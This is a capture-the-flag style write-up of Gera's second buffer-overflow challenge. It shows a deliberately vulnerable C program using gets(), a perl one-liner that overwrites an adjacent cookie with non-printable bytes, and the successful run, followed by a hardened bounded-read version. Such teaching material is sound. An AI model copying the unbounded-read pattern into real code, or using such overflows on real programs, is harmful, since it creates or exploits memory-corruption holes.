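#include <stdio.h>

int main() {
    int cookie;       /* never initialized; only the overflow can set it */
    char buf[80];

    printf("buf: %08x cookie: %08x\n", &buf, &cookie);
    gets(buf);        /* unbounded read: input past 80 bytes runs into cookie */

    if (cookie == 0x01020305)
        printf("you win!\n");
}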
Gera's challenge #2 is exactly the same as the first one, except for the cookie value we need to write. What makes this interesting is that the characters are not "printable" (they don't have a symbolic representation).
There are a few ways to deal with this:
- Take a file similar to the original one and use a hex editor, like hexcurse(1), to manually modify it.
- Use inline perl.
  perl -e 'print "q" x 80 . "\x05\x03\x02\x01"'
- Enter the special characters directly using Ctrl+V followed by Ctrl+key, where the key is 0x40 + the value. This won't necessarily work on your terminal due to the Ctrl+C (needed for the 0x03 byte).
%./a.out <exploit
buf: bfbfe9e8 cookie: bfbfea38
you win!
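For contrast, here is a hardened counterpart to the challenge code, fed the same 84 bytes the perl one-liner prints. This is an added example, not code from the original post or from Gera; `struct frame`, `read_line_bounded` and `run_hardened` are hypothetical names, and the struct only models `buf` sitting directly below `cookie`.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 80   /* same size as buf in the challenge */
/* Models the challenge's locals: buf with cookie right behind it. */
struct frame { char buf[BUF_SIZE]; int cookie; };

/* Bounded replacement for gets(): writes at most size bytes into buf.
 * Returns 0 if the line fit, 1 if too long (excess discarded), -1 on EOF. */
int read_line_bounded(FILE *in, char *buf, size_t size)
{
    int c, too_long = 0;
    if (fgets(buf, (int)size, in) == NULL)
        return -1;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';
        return 0;
    }
    /* No newline stored: drain the rest so it is not read as a new line. */
    while ((c = fgetc(in)) != EOF && c != '\n')
        too_long = 1;
    return too_long;
}

/* Feed input to the bounded reader; set *status, return the cookie. */
int run_hardened(const unsigned char *input, size_t n, int *status)
{
    struct frame f;
    FILE *in = tmpfile();
    memset(&f, 0, sizeof f);              /* cookie starts at a known 0 */
    if (in == NULL) { *status = -1; return 0; }
    fwrite(input, 1, n, in);
    rewind(in);
    *status = read_line_bounded(in, f.buf, sizeof f.buf);
    fclose(in);
    return f.cookie;
}

int main(void)
{
    unsigned char input[BUF_SIZE + 4];    /* constructed sample input */
    int status, cookie;
    memset(input, 'q', BUF_SIZE);
    memcpy(input + BUF_SIZE, "\x05\x03\x02\x01", 4);
    cookie = run_hardened(input, sizeof input, &status);
    printf("status: %d cookie: %08x\n", status, (unsigned)cookie);
    return cookie != 0;                   /* exit 0 when cookie is intact */
}
```

With the bounded read, the over-long line is reported (status 1) and the four cookie bytes are discarded instead of landing in `cookie`.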